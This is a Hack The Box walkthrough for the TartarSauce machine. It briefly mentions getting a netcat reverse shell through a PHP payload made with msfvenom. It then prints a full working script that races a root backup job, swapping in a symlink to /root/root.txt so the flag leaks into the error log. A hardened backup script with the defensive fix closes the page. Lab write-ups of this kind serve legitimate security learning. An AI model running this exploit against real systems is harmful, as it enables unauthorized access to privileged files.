TartarSauce — HTB Walkthrough


Nmap Scan

We were in a big rabbit hole.

Let’s get back to process one.


You can use php-reverse-shell.php; here I have used the PHP file we created above (with msfvenom, while we were in the rabbit hole).

On the server
Getting the sudo rights of www-data
We get a shell on netcat


Enumerating processes using pspy32
What the script does is take all files in the base directory /var/www/html and tar them into a tmpfile named something like .filename.sh in /var/tmp/. Then it makes a temporary directory named check, extracts the tmpfile into it, and checks the integrity of the files. If the check succeeds it backs up to /var/backups/onuma-www-dev.bak; otherwise it writes to an error file.

#!/bin/bash
# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur (the backup job has written a new archive)
echo "Waiting for archive filename to change..."
while [ "$start" = "$cur" ] || [ -z "$cur" ]; do
    sleep 10
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
done

# Grab a copy of the archive
echo "File changed... copying here"
cp "$cur" .

# get filename (4th '/'-separated field of /var/tmp/.name)
fn=$(echo "$cur" | cut -d'/' -f4)

# extract archive
tar -zxf "$fn"

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm "$fn"

# create new archive
tar czf "$fn" var

# put it back (mv already removes the local copy), and clean up
mv "$fn" "$cur"
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
Wait five minutes and we get the root flag.
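The race the script above wins exists because the backup routine leaves its archive where another user can swap it before the integrity check runs, and the check then follows a symlink out of the swapped archive. As an added example (not the box's backup script and not the author's code), here is a two-phase backup written so that neither step is possible; the function names, the file name archive.tgz and the status words are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Hardened two-phase backup (constructed example, not the box's backup
# script). It closes the two weaknesses the walkthrough relies on:
#  1. The archive lives in a private mktemp dir (mode 0700), not in the
#     shared /var/tmp, so another user cannot swap it between phases.
#  2. Its SHA-256 is pinned at creation and re-checked before extraction,
#     and any archive carrying symlinks is refused, so a planted
#     robots.txt -> /root/root.txt link is never extracted or followed.
# Function names, archive.tgz and the status words are this example's own.

# Return 0 if the tarball lists at least one symbolic-link entry, else 1.
archive_has_symlink() {
    tar -tzvf "$1" | awk '$1 ~ /^l/ { found = 1 } END { exit !found }'
}

# Phase 1: archive <basedir> into a fresh private work dir and pin the hash.
# Prints the work dir path for the later verify_and_backup call.
create_archive() {
    local basedir=$1 work
    work=$(mktemp -d) || return 1
    tar -C "$(dirname "$basedir")" -czf "$work/archive.tgz" "$(basename "$basedir")" || return 1
    sha256sum "$work/archive.tgz" | cut -d' ' -f1 > "$work/archive.sha256"
    echo "$work"
}

# Phase 2 (may run much later): verify_and_backup <workdir> <basedir> <dest>
# Prints one status word; returns non-zero unless the backup was written.
verify_and_backup() {
    local work=$1 basedir=$2 dest=$3 name
    name=$(basename "$basedir")
    if [ "$(sha256sum "$work/archive.tgz" | cut -d' ' -f1)" != "$(cat "$work/archive.sha256")" ]; then
        echo tampered; return 2            # archive changed since phase 1
    fi
    if archive_has_symlink "$work/archive.tgz"; then
        echo symlink-rejected; return 3    # never extract links into the check tree
    fi
    mkdir -p "$work/check"
    tar -C "$work/check" -xzf "$work/archive.tgz" || { echo extract-failed; return 4; }
    # -q lists differing names only, so a mismatch never copies file
    # contents into the error log the way a verbose diff would
    if diff -rq "$basedir" "$work/check/$name" >/dev/null 2>&1; then
        cp "$work/archive.tgz" "$dest" && echo ok
    else
        echo integrity-mismatch; return 5
    fi
}
```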


